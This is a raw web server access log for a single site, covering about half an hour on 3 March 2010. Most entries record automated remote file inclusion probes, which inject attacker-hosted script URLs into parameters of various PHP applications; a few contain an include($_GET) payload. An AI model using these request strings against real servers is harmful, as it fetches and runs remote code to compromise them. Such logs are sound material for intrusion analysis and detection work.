78.110.50.114 - - [03/Mar/2010:05:43:19 -0800] "GET /?path%5Bdocroot%5D=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [03/Mar/2010:05:43:19 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
92.60.176.46 - - [03/Mar/2010:05:43:23 -0800] "GET /logs/access_100202.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
92.60.176.46 - - [03/Mar/2010:05:43:23 -0800] "GET /logs/access_100202.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:05:44:17 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:05:44:17 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:05:44:17 -0800] "GET /logs/access_100222.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:05:44:18 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://kucing1.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:05:44:18 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://kucing1.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:05:44:18 -0800] "GET /logs/access_100130.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://kucing1.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [03/Mar/2010:05:44:21 -0800] "GET /logs/access_100129.log//?path%5Bdocroot%5D=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [03/Mar/2010:05:44:41 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [03/Mar/2010:05:44:41 -0800] "GET /logs/access_100224.log%20%20//?path%5Bdocroot%5D=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [03/Mar/2010:05:44:42 -0800] "GET /?path%5Bdocroot%5D=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:05:44:52 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:05:44:52 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:05:44:52 -0800] "GET /logs/access_100222.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:05:45:05 -0800] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://kucing1.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
92.60.176.46 - - [03/Mar/2010:05:45:13 -0800] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
92.60.176.46 - - [03/Mar/2010:05:45:13 -0800] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
92.60.176.46 - - [03/Mar/2010:05:45:19 -0800] "GET /logs/access_100220.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
92.60.176.46 - - [03/Mar/2010:05:45:19 -0800] "GET /logs/access_100221.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [03/Mar/2010:05:45:20 -0800] "GET /logs/access_100219.log///logs/access.log//write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [03/Mar/2010:05:45:20 -0800] "GET //logs/access.log//write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
92.60.176.46 - - [03/Mar/2010:05:45:21 -0800] "GET /logs/access_100220.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
92.60.176.46 - - [03/Mar/2010:05:45:21 -0800] "GET /logs/access_100221.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [03/Mar/2010:05:45:22 -0800] "GET /logs/access_100129.log//?path%5Bdocroot%5D=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [03/Mar/2010:05:45:22 -0800] "GET /logs///logs/access.log//write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [03/Mar/2010:05:45:42 -0800] "GET /logs/access_100211.log///logs/access.log//write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.111.95.42 - - [03/Mar/2010:05:45:50 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cepp56.com//editor/ts??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
92.60.176.46 - - [03/Mar/2010:05:45:51 -0800] "GET /logs/access_100211.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.111.95.42 - - [03/Mar/2010:05:45:51 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cepp56.com//editor/ts??? HTTP/1.1" 200 3642 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
92.60.176.46 - - [03/Mar/2010:05:45:53 -0800] "GET /logs/access_100211.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.112.232 - - [03/Mar/2010:05:46:05 -0800] "GET /logs/access_100225.log HTTP/1.0" 200 2514239 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
92.60.176.46 - - [03/Mar/2010:05:46:17 -0800] "GET /logs/access_100218.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
92.60.176.46 - - [03/Mar/2010:05:46:25 -0800] "GET /logs/access_100218.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [03/Mar/2010:05:46:43 -0800] "GET /logs/access_100125.log///logs/access.log//write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [03/Mar/2010:05:46:43 -0800] "GET //logs/access.log//write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
128.241.54.188 - - [03/Mar/2010:05:46:46 -0800] "GET /logs/access_100206.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [03/Mar/2010:05:47:11 -0800] "GET /logs/access_100129.log%20%20//?path%5Bdocroot%5D=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
92.60.176.46 - - [03/Mar/2010:05:47:27 -0800] "GET /logs/access_100130.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
92.60.176.46 - - [03/Mar/2010:05:47:27 -0800] "GET /logs/access_100206.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:05:47:31 -0800] "GET /logs/access_100213.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
128.241.54.188 - - [03/Mar/2010:05:47:36 -0800] "GET /logs/access_100214.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.112.232 - - [03/Mar/2010:05:47:36 -0800] "GET /ideal/forum/viewtopic.php?p=27066 HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.112.232 - - [03/Mar/2010:05:47:36 -0800] "GET /style/polstandard.css HTTP/1.0" 200 5623 "http://www.puaga.com/ideal/forum/viewtopic.php?p=27066" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.112.232 - - [03/Mar/2010:05:47:36 -0800] "GET /style/pngHack.css HTTP/1.0" 200 42 "http://www.puaga.com/ideal/forum/viewtopic.php?p=27066" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
70.86.52.250 - - [03/Mar/2010:05:48:13 -0800] "GET /logs///bbs//write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [03/Mar/2010:05:48:14 -0800] "GET /logs/access_100219.log///bbs//write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [03/Mar/2010:05:48:14 -0800] "GET //bbs//write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.238.38 - - [03/Mar/2010:05:48:16 -0800] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [03/Mar/2010:05:48:28 -0800] "GET /logs/access_100211.log///bbs//write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [03/Mar/2010:05:48:47 -0800] "GET /logs/access_100219.log%20%20///logs/access.log//write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [03/Mar/2010:05:48:47 -0800] "GET /logs///logs/access.log//write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [03/Mar/2010:05:48:49 -0800] "GET //logs/access.log//write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:05:48:52 -0800] "GET /logs/access_100213.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [03/Mar/2010:05:49:17 -0800] "GET /logs/access_100125.log///bbs//write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
92.60.176.46 - - [03/Mar/2010:05:49:22 -0800] "GET /logs/access_100130.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
92.60.176.46 - - [03/Mar/2010:05:49:23 -0800] "GET /logs/access_100206.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [03/Mar/2010:05:50:13 -0800] "GET /logs/access_100211.log%20%20///logs/access.log//write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [03/Mar/2010:05:50:19 -0800] "GET /logs/access_100211.log///logs/access.log//write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.111.95.42 - - [03/Mar/2010:05:51:11 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cepp56.com//editor/ts??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
193.111.95.42 - - [03/Mar/2010:05:51:12 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cepp56.com//editor/ts??? HTTP/1.1" 200 3642 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
70.86.52.250 - - [03/Mar/2010:05:51:18 -0800] "GET /logs/access_100219.log///bbs//write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.37.97 - - [03/Mar/2010:05:51:31 -0800] "GET /mail/ HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
70.86.52.250 - - [03/Mar/2010:05:51:35 -0800] "GET /logs///bbs//write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [03/Mar/2010:05:51:35 -0800] "GET /logs/access_100219.log%20%20///bbs//write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.238.38 - - [03/Mar/2010:05:52:09 -0800] "GET /logs//&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.238.38 - - [03/Mar/2010:05:52:10 -0800] "GET /&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:05:52:23 -0800] "GET /logs/access_100130.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://kucing1.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [03/Mar/2010:05:52:42 -0800] "GET /logs/access_100226.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [03/Mar/2010:05:52:42 -0800] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [03/Mar/2010:05:52:42 -0800] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [03/Mar/2010:05:52:45 -0800] "GET /logs/access_100226.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [03/Mar/2010:05:52:45 -0800] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [03/Mar/2010:05:52:45 -0800] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [03/Mar/2010:05:52:50 -0800] "GET /logs/access_100211.log%20%20///bbs//write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [03/Mar/2010:05:53:10 -0800] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [03/Mar/2010:05:53:10 -0800] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [03/Mar/2010:05:53:10 -0800] "GET /logs/access_100226.log%20%20/historytemplate.php?cms[support]=1&cms[tngpath]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:05:53:19 -0800] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://kucing1.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.238.38 - - [03/Mar/2010:05:53:42 -0800] "GET /logs/access_100215.log%20%20//&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [03/Mar/2010:05:55:07 -0800] "GET /logs/access_100226.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.122.251.114 - - [03/Mar/2010:05:55:21 -0800] "GET /logs/access_100202.log%20%20/nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.250.255.242 - - [03/Mar/2010:05:55:29 -0800] "GET /logs/access_100109.log HTTP/1.1" 404 5258 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:05:56:05 -0800] "GET /logs/access_100128.log//ashnews.php?pathtoashnews=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:05:56:10 -0800] "GET /logs/access_100219.log//ashnews.php?pathtoashnews=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:05:56:28 -0800] "GET /logs/access_100224.log//index.php?_REQUEST=&_REQUEST[option]=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:05:56:44 -0800] "GET /logs/access_100224.log//index.php?_REQUEST=&_REQUEST[option]=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:05:56:59 -0800] "GET /logs/access_100219.log//index.php?_REQUEST=&_REQUEST[option]=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:05:57:10 -0800] "GET /logs/access_100219.log//index.php?_REQUEST=&_REQUEST[option]=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [03/Mar/2010:05:59:23 -0800] "GET /logs/access_100215.log//modules/PNphpBB2/includes/functions_admin.php?phpbb.root.path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [03/Mar/2010:05:59:23 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb.root.path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [03/Mar/2010:05:59:23 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb.root.path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [03/Mar/2010:06:00:16 -0800] "GET /logs//include/mail.inc.php?skin_board_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [03/Mar/2010:06:00:16 -0800] "GET /include/mail.inc.php?skin_board_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [03/Mar/2010:06:00:16 -0800] "GET /logs/access_100202.log%20%20//include/mail.inc.php?skin_board_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [03/Mar/2010:06:01:20 -0800] "GET /logs/access_100226.log%20%20//include/mail.inc.php?skin_board_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [03/Mar/2010:06:05:05 -0800] "GET /errors.php?error=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [03/Mar/2010:06:05:05 -0800] "GET /logs/errors.php?error=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [03/Mar/2010:06:05:05 -0800] "GET /logs/access_100126.log/errors.php?error=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [03/Mar/2010:06:05:35 -0800] "GET /logs/access_100212.log/errors.php?error=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.112.232 - - [03/Mar/2010:06:05:50 -0800] "GET /logs/access_100209.log HTTP/1.0" 200 1587761 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
89.108.64.216 - - [03/Mar/2010:06:10:31 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
216.119.103.16 - - [03/Mar/2010:06:13:13 -0800] "GET /nullpo/index.php/nullpo/index.php?subdir=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [03/Mar/2010:06:13:13 -0800] "GET /logs/nullpo/index.php/nullpo/index.php?subdir=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [03/Mar/2010:06:13:13 -0800] "GET /logs/access_100202.log%20%20/nullpo/index.php/nullpo/index.php?subdir=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [03/Mar/2010:06:13:47 -0800] "GET /nullpo/index.php/nullpo/index.php?subdir=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [03/Mar/2010:06:13:47 -0800] "GET /logs/nullpo/index.php/nullpo/index.php?subdir=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [03/Mar/2010:06:13:47 -0800] "GET /logs/access_100202.log%20%20/nullpo/index.php/nullpo/index.php?subdir=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:06:16:41 -0800] "GET /logs/access_100208.log//////?_SERVER[DOCUMENT_ROOT]=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:06:16:41 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:06:16:42 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:06:16:43 -0800] "GET /logs/access_100208.log//////?_SERVER[DOCUMENT_ROOT]=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
